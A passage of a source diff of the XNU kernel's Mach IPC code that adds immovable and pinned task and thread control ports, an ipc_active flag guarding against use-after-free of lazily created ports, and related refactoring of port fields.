IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_SOFT = 0x10, + IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_HARD = 0x20, +}); + +extern ipc_control_port_options_t ipc_control_port_options; +extern bool pinned_control_port_enabled; +extern bool immovable_control_port_enabled; + #endif /* MACH_KERNEL_PRIVATE */ #endif /* KERNEL_PRIVATE */ diff --git a/osfmk/kern/ipc_mig.c b/osfmk/kern/ipc_mig.c index d47764b90..c1c99b932 100644 --- a/osfmk/kern/ipc_mig.c +++ b/osfmk/kern/ipc_mig.c @@ -347,7 +347,7 @@ mach_msg_rpc_from_kernel( mach_msg_size_t send_size, mach_msg_size_t rcv_size) { - return kernel_mach_msg_rpc(msg, send_size, rcv_size, TRUE, NULL); + return kernel_mach_msg_rpc(msg, send_size, rcv_size, TRUE, TRUE, NULL); } #endif /* IKM_SUPPORT_LEGACY */ @@ -357,7 +357,7 @@ mach_msg_rpc_from_kernel_proper( mach_msg_size_t send_size, mach_msg_size_t rcv_size) { - return kernel_mach_msg_rpc(msg, send_size, rcv_size, FALSE, NULL); + return kernel_mach_msg_rpc(msg, send_size, rcv_size, FALSE, TRUE, NULL); } mach_msg_return_t @@ -369,6 +369,7 @@ kernel_mach_msg_rpc( __unused #endif boolean_t legacy, + boolean_t interruptible, boolean_t *message_moved) { thread_t self = current_thread(); @@ -449,7 +450,7 @@ kernel_mach_msg_rpc( require_ip_active(reply); /* JMM - why this check? */ - if (!self->active && !self->inspection) { + if (interruptible && !self->active && !self->inspection) { ipc_port_dealloc_reply(reply); self->ith_rpc_reply = IP_NULL; return MACH_RCV_INTERRUPTED; @@ -462,7 +463,7 @@ kernel_mach_msg_rpc( MACH_MSG_OPTION_NONE, MACH_MSG_SIZE_MAX, MACH_MSG_TIMEOUT_NONE, - THREAD_INTERRUPTIBLE); + interruptible ? THREAD_INTERRUPTIBLE : THREAD_UNINT); mr = self->ith_state; kmsg = self->ith_kmsg; @@ -475,7 +476,7 @@ kernel_mach_msg_rpc( } assert(mr == MACH_RCV_INTERRUPTED); - + assert(interruptible); assert(reply == self->ith_rpc_reply); if (self->ast & AST_APC) { @@ -1036,7 +1037,7 @@ convert_mig_object_to_port( * if this is the first send right */ if (!ipc_kobject_make_send_lazy_alloc_port(&mig_object->port, - (ipc_kobject_t) mig_object, IKOT_MIG, false, 0)) { + (ipc_kobject_t) mig_object, IKOT_MIG, IPC_KOBJECT_ALLOC_NONE, false, 0)) { mig_object_deallocate(mig_object); } diff --git a/osfmk/kern/ipc_mig.h b/osfmk/kern/ipc_mig.h index 48abc2591..cbb2f2aa3 100644 --- a/osfmk/kern/ipc_mig.h +++ b/osfmk/kern/ipc_mig.h @@ -161,6 +161,7 @@ mach_msg_return_t kernel_mach_msg_rpc( mach_msg_size_t send_size, mach_msg_size_t rcv_size, boolean_t legacy, + boolean_t interruptible, boolean_t *message_moved); #endif /* XNU_KERNEL_PRIVATE */ diff --git a/osfmk/kern/ipc_misc.c b/osfmk/kern/ipc_misc.c index aaec28a5d..6e7638f5e 100644 --- a/osfmk/kern/ipc_misc.c +++ b/osfmk/kern/ipc_misc.c @@ -156,7 +156,7 @@ fileport_invoke(task_t task, mach_port_name_t name, kr = ipc_object_copyin(task->itk_space, name, MACH_MSG_TYPE_COPY_SEND, (ipc_object_t *)&fileport, 0, NULL, - IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND); + IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND); if (kr != KERN_SUCCESS) { return kr; } diff --git a/osfmk/kern/ipc_sync.c b/osfmk/kern/ipc_sync.c index 643c38fbb..34bff5606 100644 --- a/osfmk/kern/ipc_sync.c +++ b/osfmk/kern/ipc_sync.c @@ -140,7 +140,7 @@ convert_semaphore_to_port(semaphore_t semaphore) * semaphore_notify if this is the first send right */ if (!ipc_kobject_make_send_lazy_alloc_port(&semaphore->port, - (ipc_kobject_t) semaphore, IKOT_SEMAPHORE, false, 0)) { + (ipc_kobject_t) semaphore, IKOT_SEMAPHORE, IPC_KOBJECT_ALLOC_NONE, false, 0)) { semaphore_dereference(semaphore); } return semaphore->port; diff --git a/osfmk/kern/ipc_tt.c b/osfmk/kern/ipc_tt.c index 7a7d3b783..f02ed471a 100644 --- a/osfmk/kern/ipc_tt.c +++ b/osfmk/kern/ipc_tt.c @@ -91,6 +91,7 @@ #include #include #include +#include #include #include @@ -109,21 +110,18 @@ extern int cs_relax_platform_task_ports; extern boolean_t IOTaskHasEntitlement(task_t, const char *); /* forward declarations */ -task_t convert_port_to_locked_task(ipc_port_t port, boolean_t eval); -task_inspect_t convert_port_to_locked_task_inspect(ipc_port_t port); -task_read_t convert_port_to_locked_task_read(ipc_port_t port); -static task_read_t convert_port_to_task_read_locked(ipc_port_t port); static kern_return_t port_allowed_with_task_flavor(int which, mach_task_flavor_t flavor); static kern_return_t port_allowed_with_thread_flavor(int which, mach_thread_flavor_t flavor); -static task_inspect_t convert_port_to_task_inspect_locked(ipc_port_t port); static void ipc_port_bind_special_reply_port_locked(ipc_port_t port); static kern_return_t ipc_port_unbind_special_reply_port(thread_t thread, boolean_t unbind_active_port); kern_return_t task_conversion_eval(task_t caller, task_t victim); static ipc_space_t convert_port_to_space_no_eval(ipc_port_t port); -static task_t convert_port_to_task_no_eval(ipc_port_t port); static thread_t convert_port_to_thread_no_eval(ipc_port_t port); static ipc_port_t convert_task_to_port_with_flavor(task_t task, mach_task_flavor_t flavor); static ipc_port_t convert_thread_to_port_with_flavor(thread_t thread, mach_thread_flavor_t flavor); +static task_read_t convert_port_to_task_read_no_eval(ipc_port_t port); +static thread_read_t convert_port_to_thread_read_no_eval(ipc_port_t port); +static ipc_space_read_t convert_port_to_space_read_no_eval(ipc_port_t port); /* * Routine: ipc_task_init @@ -144,7 +142,7 @@ ipc_task_init( ipc_space_t space; ipc_port_t kport; ipc_port_t nport; - + ipc_port_t pport; kern_return_t kr; int i; @@ -156,10 +154,21 @@ ipc_task_init( space->is_task = task; - kport = ipc_port_alloc_kernel(); + if (immovable_control_port_enabled) { + ipc_kobject_alloc_options_t options = IPC_KOBJECT_ALLOC_IMMOVABLE_SEND; + if (pinned_control_port_enabled) { + options |= IPC_KOBJECT_ALLOC_PINNED; + } + pport = ipc_kobject_alloc_port(IKO_NULL, IKOT_NONE, options); - if (kport == IP_NULL) { - panic("ipc_task_init"); + kport = ipc_kobject_alloc_labeled_port(IKO_NULL, IKOT_TASK_CONTROL, + IPC_LABEL_SUBST_TASK, IPC_KOBJECT_ALLOC_NONE); + kport->ip_alt_port = pport; + } else { + kport = ipc_kobject_alloc_port(IKO_NULL, IKOT_TASK_CONTROL, + IPC_KOBJECT_ALLOC_NONE); + + pport = kport; } nport = ipc_port_alloc_kernel(); @@ -167,15 +176,21 @@ ipc_task_init( panic("ipc_task_init"); } + if (pport == IP_NULL) { + panic("ipc_task_init"); + } + itk_lock_init(task); - task->itk_self[TASK_FLAVOR_CONTROL] = kport; - task->itk_self[TASK_FLAVOR_NAME] = nport; + task->itk_task_ports[TASK_FLAVOR_CONTROL] = kport; + task->itk_task_ports[TASK_FLAVOR_NAME] = nport; /* Lazily allocated on-demand */ - task->itk_self[TASK_FLAVOR_INSPECT] = IP_NULL; - task->itk_self[TASK_FLAVOR_READ] = IP_NULL; - task->itk_resume = IP_NULL; + task->itk_task_ports[TASK_FLAVOR_INSPECT] = IP_NULL; + task->itk_task_ports[TASK_FLAVOR_READ] = IP_NULL; + task->itk_dyld_notify = NULL; + task->itk_self = pport; + task->itk_resume = IP_NULL; /* Lazily allocated on-demand */ if (task_is_a_corpse_fork(task)) { /* * No sender's notification for corpse would not @@ -221,7 +236,7 @@ ipc_task_init( } } else { itk_lock(parent); - assert(parent->itk_self[TASK_FLAVOR_CONTROL] != IP_NULL); + assert(parent->itk_task_ports[TASK_FLAVOR_CONTROL] != IP_NULL); /* inherit registered ports */ @@ -280,24 +295,33 @@ ipc_task_enable( ipc_port_t nport; ipc_port_t iport; ipc_port_t rdport; + ipc_port_t pport; itk_lock(task); - kport = task->itk_self[TASK_FLAVOR_CONTROL]; + + assert(!task->ipc_active || task_is_a_corpse(task)); + task->ipc_active = true; + + kport = task->itk_task_ports[TASK_FLAVOR_CONTROL]; if (kport != IP_NULL) { ipc_kobject_set(kport, (ipc_kobject_t) task, IKOT_TASK_CONTROL); } - nport = task->itk_self[TASK_FLAVOR_NAME]; + nport = task->itk_task_ports[TASK_FLAVOR_NAME]; if (nport != IP_NULL) { ipc_kobject_set(nport, (ipc_kobject_t) task, IKOT_TASK_NAME); } - iport = task->itk_self[TASK_FLAVOR_INSPECT]; + iport = task->itk_task_ports[TASK_FLAVOR_INSPECT]; if (iport != IP_NULL) { ipc_kobject_set(iport, (ipc_kobject_t) task, IKOT_TASK_INSPECT); } - rdport = task->itk_self[TASK_FLAVOR_READ]; + rdport = task->itk_task_ports[TASK_FLAVOR_READ]; if (rdport != IP_NULL) { ipc_kobject_set(rdport, (ipc_kobject_t) task, IKOT_TASK_READ); } + pport = task->itk_self; + if (immovable_control_port_enabled && pport != IP_NULL) { + ipc_kobject_set(pport, (ipc_kobject_t) task, IKOT_TASK_CONTROL); + } itk_unlock(task); } @@ -319,24 +343,45 @@ ipc_task_disable( ipc_port_t iport; ipc_port_t rdport; ipc_port_t rport; + ipc_port_t pport; itk_lock(task); - kport = task->itk_self[TASK_FLAVOR_CONTROL]; + + /* + * This innocuous looking line is load bearing. + * + * It is used to disable the creation of lazy made ports. + * We must do so before we drop the last reference on the task, + * as task ports do not own a reference on the task, and + * convert_port_to_task* will crash trying to resurect a task. + */ + task->ipc_active = false; + + kport = task->itk_task_ports[TASK_FLAVOR_CONTROL]; if (kport != IP_NULL) { - ipc_kobject_set(kport, IKO_NULL, IKOT_NONE); + ip_lock(kport); + kport->ip_alt_port = IP_NULL; + ipc_kobject_set_atomically(kport, IKO_NULL, IKOT_NONE); + ip_unlock(kport); } - nport = task->itk_self[TASK_FLAVOR_NAME]; + nport = task->itk_task_ports[TASK_FLAVOR_NAME]; if (nport != IP_NULL) { ipc_kobject_set(nport, IKO_NULL, IKOT_NONE); } - iport = task->itk_self[TASK_FLAVOR_INSPECT]; + iport = task->itk_task_ports[TASK_FLAVOR_INSPECT]; if (iport != IP_NULL) { ipc_kobject_set(iport, IKO_NULL, IKOT_NONE); } - rdport = task->itk_self[TASK_FLAVOR_READ]; + rdport = task->itk_task_ports[TASK_FLAVOR_READ]; if (rdport != IP_NULL) { ipc_kobject_set(rdport, IKO_NULL, IKOT_NONE); } + pport = task->itk_self; + if (pport != kport && pport != IP_NULL) { + assert(immovable_control_port_enabled); + assert(pport->ip_immovable_send); + ipc_kobject_set(pport, IKO_NULL, IKOT_NONE); + } rport = task->itk_resume; if (rport != IP_NULL) { @@ -375,27 +420,51 @@ ipc_task_terminate( ipc_port_t iport; ipc_port_t rdport; ipc_port_t rport; - int i; + ipc_port_t pport; + ipc_port_t sself; + ipc_port_t *notifiers_ptr = NULL; itk_lock(task); - kport = task->itk_self[TASK_FLAVOR_CONTROL]; + + /* + * If we ever failed to clear ipc_active before the last reference + * was dropped, lazy ports might be made and used after the last + * reference is dropped and cause use after free (see comment in + * ipc_task_disable()). + */ + assert(!task->ipc_active); + + kport = task->itk_task_ports[TASK_FLAVOR_CONTROL]; + sself = task->itk_settable_self; if (kport == IP_NULL) { /* the task is already terminated (can this happen?) */ itk_unlock(task); return; } - task->itk_self[TASK_FLAVOR_CONTROL] = IP_NULL; + task->itk_task_ports[TASK_FLAVOR_CONTROL] = IP_NULL; - rdport = task->itk_self[TASK_FLAVOR_READ]; - task->itk_self[TASK_FLAVOR_READ] = IP_NULL; + rdport = task->itk_task_ports[TASK_FLAVOR_READ]; + task->itk_task_ports[TASK_FLAVOR_READ] = IP_NULL; - iport = task->itk_self[TASK_FLAVOR_INSPECT]; - task->itk_self[TASK_FLAVOR_INSPECT] = IP_NULL; + iport = task->itk_task_ports[TASK_FLAVOR_INSPECT]; + task->itk_task_ports[TASK_FLAVOR_INSPECT] = IP_NULL; - nport = task->itk_self[TASK_FLAVOR_NAME]; + nport = task->itk_task_ports[TASK_FLAVOR_NAME]; assert(nport != IP_NULL); - task->itk_self[TASK_FLAVOR_NAME] = IP_NULL; + task->itk_task_ports[TASK_FLAVOR_NAME] = IP_NULL; + + if (task->itk_dyld_notify) { + notifiers_ptr = task->itk_dyld_notify; + task->itk_dyld_notify = NULL; + } + + if (immovable_control_port_enabled) { + pport = task->itk_self; + assert(pport != IP_NULL); + } + + task->itk_self = IP_NULL; rport = task->itk_resume; task->itk_resume = IP_NULL; @@ -403,12 +472,20 @@ ipc_task_terminate( itk_unlock(task); /* release the naked send rights */ + if (IP_VALID(sself)) { + ipc_port_release_send(sself); + } - if (IP_VALID(task->itk_settable_self)) { - ipc_port_release_send(task->itk_settable_self); + if (notifiers_ptr) { + for (int i = 0; i < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; i++) { + if (IP_VALID(notifiers_ptr[i])) { + ipc_port_release_send(notifiers_ptr[i]); + } + } + kfree(notifiers_ptr, DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT * sizeof(ipc_port_t)); } - for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) { + for (int i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) { if (IP_VALID(task->exc_actions[i].port)) { ipc_port_release_send(task->exc_actions[i].port); } @@ -441,13 +518,22 @@ ipc_task_terminate( ipc_port_release_send(task->itk_debug_control); } - for (i = 0; i < TASK_PORT_REGISTER_MAX; i++) { + for (int i = 0; i < TASK_PORT_REGISTER_MAX; i++) { if (IP_VALID(task->itk_registered[i])) { ipc_port_release_send(task->itk_registered[i]); } } /* destroy the kernel ports */ + if (immovable_control_port_enabled) { + ip_lock(kport); + kport->ip_alt_port = IP_NULL; + ipc_kobject_set_atomically(kport, IKO_NULL, IKOT_NONE); + ip_unlock(kport); + + /* pport == kport if immovability is off */ + ipc_port_dealloc_kernel(pport); + } ipc_port_dealloc_kernel(kport); ipc_port_dealloc_kernel(nport); if (iport != IP_NULL) { @@ -479,32 +565,53 @@ void ipc_task_reset( task_t task) { - ipc_port_t old_kport, new_kport; + ipc_port_t old_kport, old_pport, new_kport, new_pport; ipc_port_t old_sself; ipc_port_t old_rdport; ipc_port_t old_iport; ipc_port_t old_exc_actions[EXC_TYPES_COUNT]; - int i; + ipc_port_t *notifiers_ptr = NULL; #if CONFIG_MACF /* Fresh label to unset credentials in existing labels. */ struct label *unset_label = mac_exc_create_label(); #endif - new_kport = ipc_kobject_alloc_port((ipc_kobject_t)task, IKOT_TASK_CONTROL, - IPC_KOBJECT_ALLOC_MAKE_SEND); + if (immovable_control_port_enabled) { + ipc_kobject_alloc_options_t options = IPC_KOBJECT_ALLOC_IMMOVABLE_SEND; + if (pinned_control_port_enabled) { + options |= IPC_KOBJECT_ALLOC_PINNED; + } + + new_pport = ipc_kobject_alloc_port((ipc_kobject_t)task, + IKOT_TASK_CONTROL, options); + + new_kport = ipc_kobject_alloc_labeled_port((ipc_kobject_t)task, + IKOT_TASK_CONTROL, IPC_LABEL_SUBST_TASK, + IPC_KOBJECT_ALLOC_NONE); + new_kport->ip_alt_port = new_pport; + } else { + new_kport = ipc_kobject_alloc_port((ipc_kobject_t)task, + IKOT_TASK_CONTROL, IPC_KOBJECT_ALLOC_NONE); + + new_pport = new_kport; + } itk_lock(task); - old_kport = task->itk_self[TASK_FLAVOR_CONTROL]; - old_rdport = task->itk_self[TASK_FLAVOR_READ]; - old_iport = task->itk_self[TASK_FLAVOR_INSPECT]; + old_kport = task->itk_task_ports[TASK_FLAVOR_CONTROL]; + old_rdport = task->itk_task_ports[TASK_FLAVOR_READ]; + old_iport = task->itk_task_ports[TASK_FLAVOR_INSPECT]; - if (old_kport == IP_NULL) { + old_pport = task->itk_self; + + if (old_pport == IP_NULL) { /* the task is already terminated (can this happen?) */ itk_unlock(task); - ipc_port_release_send(new_kport); ipc_port_dealloc_kernel(new_kport); + if (immovable_control_port_enabled) { + ipc_port_dealloc_kernel(new_pport); + } #if CONFIG_MACF mac_exc_free_label(unset_label); #endif @@ -512,19 +619,30 @@ ipc_task_reset( } old_sself = task->itk_settable_self; - task->itk_settable_self = task->itk_self[TASK_FLAVOR_CONTROL] = new_kport; + task->itk_task_ports[TASK_FLAVOR_CONTROL] = new_kport; + task->itk_self = new_pport; + + task->itk_settable_self = ipc_port_make_send(new_kport); /* Set the old kport to IKOT_NONE and update the exec token while under the port lock */ ip_lock(old_kport); + old_kport->ip_alt_port = IP_NULL; ipc_kobject_set_atomically(old_kport, IKO_NULL, IKOT_NONE); task->exec_token += 1; ip_unlock(old_kport); /* Reset the read and inspect flavors of task port */ - task->itk_self[TASK_FLAVOR_READ] = IP_NULL; - task->itk_self[TASK_FLAVOR_INSPECT] = IP_NULL; + task->itk_task_ports[TASK_FLAVOR_READ] = IP_NULL; + task->itk_task_ports[TASK_FLAVOR_INSPECT] = IP_NULL; - for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) { + if (immovable_control_port_enabled) { + ip_lock(old_pport); + ipc_kobject_set_atomically(old_pport, IKO_NULL, IKOT_NONE); + task->exec_token += 1; + ip_unlock(old_pport); + } + + for (int i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) { old_exc_actions[i] = IP_NULL; if (i == EXC_CORPSE_NOTIFY && task_corpse_pending_report(task)) { @@ -545,6 +663,11 @@ ipc_task_reset( } task->itk_debug_control = IP_NULL; + if (task->itk_dyld_notify) { + notifiers_ptr = task->itk_dyld_notify; + task->itk_dyld_notify = NULL; + } + itk_unlock(task); #if CONFIG_MACF @@ -557,7 +680,16 @@ ipc_task_reset( ipc_port_release_send(old_sself); } - for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) { + if (notifiers_ptr) { + for (int i = 0; i < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; i++) { + if (IP_VALID(notifiers_ptr[i])) { + ipc_port_release_send(notifiers_ptr[i]); + } + } + kfree(notifiers_ptr, DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT * sizeof(ipc_port_t)); + } + + for (int i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) { if (IP_VALID(old_exc_actions[i])) { ipc_port_release_send(old_exc_actions[i]); } @@ -565,6 +697,9 @@ ipc_task_reset( /* destroy all task port flavors */ ipc_port_dealloc_kernel(old_kport); + if (immovable_control_port_enabled) { + ipc_port_dealloc_kernel(old_pport); + } if (old_rdport != IP_NULL) { ipc_port_dealloc_kernel(old_rdport); } @@ -583,16 +718,46 @@ ipc_task_reset( void ipc_thread_init( - thread_t thread) + thread_t thread, + ipc_thread_init_options_t options) { ipc_port_t kport; + ipc_port_t pport; + ipc_kobject_alloc_options_t alloc_options = IPC_KOBJECT_ALLOC_NONE; + + /* + * Having immovable_control_port_enabled boot-arg set does not guarantee + * thread control port should be made immovable/pinned, also check options. + * + * raw mach threads created via thread_create() have neither of INIT_PINNED + * or INIT_IMMOVABLE set. + */ + if (immovable_control_port_enabled && (options & IPC_THREAD_INIT_IMMOVABLE)) { + alloc_options |= IPC_KOBJECT_ALLOC_IMMOVABLE_SEND; + + if (pinned_control_port_enabled && (options & IPC_THREAD_INIT_PINNED)) { + alloc_options |= IPC_KOBJECT_ALLOC_PINNED; + } + + pport = ipc_kobject_alloc_port((ipc_kobject_t)thread, + IKOT_THREAD_CONTROL, alloc_options); + + kport = ipc_kobject_alloc_labeled_port((ipc_kobject_t)thread, + IKOT_THREAD_CONTROL, IPC_LABEL_SUBST_THREAD, IPC_KOBJECT_ALLOC_NONE); + kport->ip_alt_port = pport; + } else { + kport = ipc_kobject_alloc_port((ipc_kobject_t)thread, + IKOT_THREAD_CONTROL, IPC_KOBJECT_ALLOC_NONE); + + pport = kport; + } + + thread->ith_thread_ports[THREAD_FLAVOR_CONTROL] = kport; + + thread->ith_settable_self = ipc_port_make_send(kport); - kport = ipc_kobject_alloc_port((ipc_kobject_t)thread, IKOT_THREAD_CONTROL, - IPC_KOBJECT_ALLOC_MAKE_SEND); + thread->ith_self = pport; - thread->ith_settable_self = thread->ith_self[THREAD_FLAVOR_CONTROL] = kport; - thread->ith_self[THREAD_FLAVOR_INSPECT] = IP_NULL; - thread->ith_self[THREAD_FLAVOR_READ] = IP_NULL; thread->ith_special_reply_port = NULL; thread->exc_actions = NULL; @@ -600,6 +765,7 @@ ipc_thread_init( thread->ith_assertions = 0; #endif + thread->ipc_active = true; ipc_kmsg_queue_init(&thread->ith_messages); thread->ith_rpc_reply = IP_NULL; @@ -649,12 +815,26 @@ void ipc_thread_disable( thread_t thread) { - ipc_port_t kport = thread->ith_self[THREAD_FLAVOR_CONTROL]; - ipc_port_t iport = thread->ith_self[THREAD_FLAVOR_INSPECT]; - ipc_port_t rdport = thread->ith_self[THREAD_FLAVOR_READ]; + ipc_port_t kport = thread->ith_thread_ports[THREAD_FLAVOR_CONTROL]; + ipc_port_t iport = thread->ith_thread_ports[THREAD_FLAVOR_INSPECT]; + ipc_port_t rdport = thread->ith_thread_ports[THREAD_FLAVOR_READ]; + ipc_port_t pport = thread->ith_self; + + /* + * This innocuous looking line is load bearing. + * + * It is used to disable the creation of lazy made ports. + * We must do so before we drop the last reference on the thread, + * as thread ports do not own a reference on the thread, and + * convert_port_to_thread* will crash trying to resurect a thread. + */ + thread->ipc_active = false; if (kport != IP_NULL) { - ipc_kobject_set(kport, IKO_NULL, IKOT_NONE); + ip_lock(kport); + kport->ip_alt_port = IP_NULL; + ipc_kobject_set_atomically(kport, IKO_NULL, IKOT_NONE); + ip_unlock(kport); } if (iport != IP_NULL) { @@ -665,6 +845,12 @@ ipc_thread_disable( ipc_kobject_set(rdport, IKO_NULL, IKOT_NONE); } + if (pport != kport && pport != IP_NULL) { + assert(immovable_control_port_enabled); + assert(pport->ip_immovable_send); + ipc_kobject_set(pport, IKO_NULL, IKOT_NONE); + } + /* unbind the thread special reply port */ if (IP_VALID(thread->ith_special_reply_port)) { ipc_port_unbind_special_reply_port(thread, TRUE); @@ -687,21 +873,33 @@ ipc_thread_terminate( ipc_port_t iport = IP_NULL; ipc_port_t rdport = IP_NULL; ipc_port_t ith_rpc_reply = IP_NULL; + ipc_port_t pport = IP_NULL; thread_mtx_lock(thread); - kport = thread->ith_self[THREAD_FLAVOR_CONTROL]; - iport = thread->ith_self[THREAD_FLAVOR_INSPECT]; - rdport = thread->ith_self[THREAD_FLAVOR_READ]; + /* + * If we ever failed to clear ipc_active before the last reference + * was dropped, lazy ports might be made and used after the last + * reference is dropped and cause use after free (see comment in + * ipc_thread_disable()). + */ + assert(!thread->ipc_active); + + kport = thread->ith_thread_ports[THREAD_FLAVOR_CONTROL]; + iport = thread->ith_thread_ports[THREAD_FLAVOR_INSPECT]; + rdport = thread->ith_thread_ports[THREAD_FLAVOR_READ]; + pport = thread->ith_self; if (kport != IP_NULL) { if (IP_VALID(thread->ith_settable_self)) { ipc_port_release_send(thread->ith_settable_self); } - thread->ith_settable_self = thread->ith_self[THREAD_FLAVOR_CONTROL] = IP_NULL; - thread->ith_self[THREAD_FLAVOR_INSPECT] = IP_NULL; - thread->ith_self[THREAD_FLAVOR_READ] = IP_NULL; + thread->ith_thread_ports[THREAD_FLAVOR_CONTROL] = IP_NULL; + thread->ith_thread_ports[THREAD_FLAVOR_READ] = IP_NULL; + thread->ith_thread_ports[THREAD_FLAVOR_INSPECT] = IP_NULL; + thread->ith_settable_self = IP_NULL; + thread->ith_self = IP_NULL; if (thread->exc_actions != NULL) { for (int i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; ++i) { @@ -723,6 +921,14 @@ ipc_thread_terminate( thread_mtx_unlock(thread); + if (pport != kport && pport != IP_NULL) { + /* this thread has immovable contorl port */ + ip_lock(kport); + kport->ip_alt_port = IP_NULL; + ipc_kobject_set_atomically(kport, IKO_NULL, IKOT_NONE); + ip_unlock(kport); + ipc_port_dealloc_kernel(pport); + } if (kport != IP_NULL) { ipc_port_dealloc_kernel(kport); } @@ -754,45 +960,80 @@ void ipc_thread_reset( thread_t thread) { - ipc_port_t old_kport, new_kport; + ipc_port_t old_kport, new_kport, old_pport, new_pport; ipc_port_t old_sself; ipc_port_t old_rdport; ipc_port_t old_iport; ipc_port_t old_exc_actions[EXC_TYPES_COUNT]; boolean_t has_old_exc_actions = FALSE; + boolean_t thread_is_immovable, thread_is_pinned; int i; #if CONFIG_MACF struct label *new_label = mac_exc_create_label(); #endif - new_kport = ipc_kobject_alloc_port((ipc_kobject_t)thread, IKOT_THREAD_CONTROL, - IPC_KOBJECT_ALLOC_MAKE_SEND); + thread_is_immovable = thread->ith_self->ip_immovable_send; + thread_is_pinned = thread->ith_self->ip_pinned; + + if (thread_is_immovable) { + ipc_kobject_alloc_options_t alloc_options = IPC_KOBJECT_ALLOC_NONE; + + if (thread_is_pinned) { + assert(pinned_control_port_enabled); + alloc_options |= IPC_KOBJECT_ALLOC_PINNED; + } + if (thread_is_immovable) { + alloc_options |= IPC_KOBJECT_ALLOC_IMMOVABLE_SEND; + } + new_pport = ipc_kobject_alloc_port((ipc_kobject_t)thread, + IKOT_THREAD_CONTROL, alloc_options); + + new_kport = ipc_kobject_alloc_labeled_port((ipc_kobject_t)thread, + IKOT_THREAD_CONTROL, IPC_LABEL_SUBST_THREAD, + IPC_KOBJECT_ALLOC_NONE); + new_kport->ip_alt_port = new_pport; + } else { + new_kport = ipc_kobject_alloc_port((ipc_kobject_t)thread, + IKOT_THREAD_CONTROL, IPC_KOBJECT_ALLOC_NONE); + + new_pport = new_kport; + } thread_mtx_lock(thread); - old_kport = thread->ith_self[THREAD_FLAVOR_CONTROL]; - old_rdport = thread->ith_self[THREAD_FLAVOR_READ]; - old_iport = thread->ith_self[THREAD_FLAVOR_INSPECT]; + old_kport = thread->ith_thread_ports[THREAD_FLAVOR_CONTROL]; + old_rdport = thread->ith_thread_ports[THREAD_FLAVOR_READ]; + old_iport = thread->ith_thread_ports[THREAD_FLAVOR_INSPECT]; + old_sself = thread->ith_settable_self; + old_pport = thread->ith_self; if (old_kport == IP_NULL && thread->inspection == FALSE) { - /* the is already terminated (can this happen?) */ + /* thread is already terminated (can this happen?) */ thread_mtx_unlock(thread); - ipc_port_release_send(new_kport); ipc_port_dealloc_kernel(new_kport); + if (thread_is_immovable) { + ipc_port_dealloc_kernel(new_pport); + } #if CONFIG_MACF mac_exc_free_label(new_label); #endif return; } - thread->ith_settable_self = thread->ith_self[THREAD_FLAVOR_CONTROL] = new_kport; - thread->ith_self[THREAD_FLAVOR_READ] = IP_NULL; - thread->ith_self[THREAD_FLAVOR_INSPECT] = IP_NULL; + thread->ipc_active = true; + thread->ith_thread_ports[THREAD_FLAVOR_CONTROL] = new_kport; + thread->ith_self = new_pport; + thread->ith_settable_self = ipc_port_make_send(new_kport); + thread->ith_thread_ports[THREAD_FLAVOR_INSPECT] = IP_NULL; + thread->ith_thread_ports[THREAD_FLAVOR_READ] = IP_NULL; if (old_kport != IP_NULL) { - ipc_kobject_set(old_kport, IKO_NULL, IKOT_NONE); + ip_lock(old_kport); + old_kport->ip_alt_port = IP_NULL; + ipc_kobject_set_atomically(old_kport, IKO_NULL, IKOT_NONE); + ip_unlock(old_kport); } if (old_rdport != IP_NULL) { ipc_kobject_set(old_rdport, IKO_NULL, IKOT_NONE); @@ -800,6 +1041,9 @@ ipc_thread_reset( if (old_iport != IP_NULL) { ipc_kobject_set(old_iport, IKO_NULL, IKOT_NONE); } + if (thread_is_immovable && old_pport != IP_NULL) { + ipc_kobject_set(old_pport, IKO_NULL, IKOT_NONE); + } /* * Only ports that were set by root-owned processes @@ -849,6 +1093,10 @@ ipc_thread_reset( ipc_port_dealloc_kernel(old_iport); } + if (thread_is_immovable && old_pport != IP_NULL) { + ipc_port_dealloc_kernel(old_pport); + } + /* unbind the thread special reply port */ if (IP_VALID(thread->ith_special_reply_port)) { ipc_port_unbind_special_reply_port(thread, TRUE); @@ -871,26 +1119,51 @@ ipc_port_t retrieve_task_self_fast( task_t task) { - __assert_only ipc_port_t sright; - ipc_port_t port; + ipc_port_t port = IP_NULL; assert(task == current_task()); itk_lock(task); - assert(task->itk_self[TASK_FLAVOR_CONTROL] != IP_NULL); - - if ((port = task->itk_settable_self) == task->itk_self[TASK_FLAVOR_CONTROL]) { - /* no interposing */ - sright = ipc_port_copy_send(port); - assert(sright == port); + assert(task->itk_self != IP_NULL); + + if (task->itk_settable_self == task->itk_task_ports[TASK_FLAVOR_CONTROL]) { + /* no interposing, return the IMMOVABLE port */ + port = ipc_port_make_send(task->itk_self); + if (immovable_control_port_enabled) { + assert(port->ip_immovable_send == 1); + if (pinned_control_port_enabled) { + /* pinned port is also immovable */ + assert(port->ip_pinned == 1); + } + } } else { - port = ipc_port_copy_send(port); + port = ipc_port_copy_send(task->itk_settable_self); } itk_unlock(task); return port; } +/* + * Routine: mach_task_is_self + * Purpose: + * [MIG call] Checks if the task (control/read/inspect/name/movable) + * port is pointing to current_task. + */ +kern_return_t +mach_task_is_self( + task_t task, + boolean_t *is_self) +{ + if (task == TASK_NULL) { + return KERN_INVALID_ARGUMENT; + } + + *is_self = (task == current_task()); + + return KERN_SUCCESS; +} + /* * Routine: retrieve_thread_self_fast * Purpose: @@ -907,21 +1180,19 @@ ipc_port_t retrieve_thread_self_fast( thread_t thread) { - __assert_only ipc_port_t sright; - ipc_port_t port; + ipc_port_t port = IP_NULL; assert(thread == current_thread()); thread_mtx_lock(thread); - assert(thread->ith_self[THREAD_FLAVOR_CONTROL] != IP_NULL); + assert(thread->ith_self != IP_NULL); - if ((port = thread->ith_settable_self) == 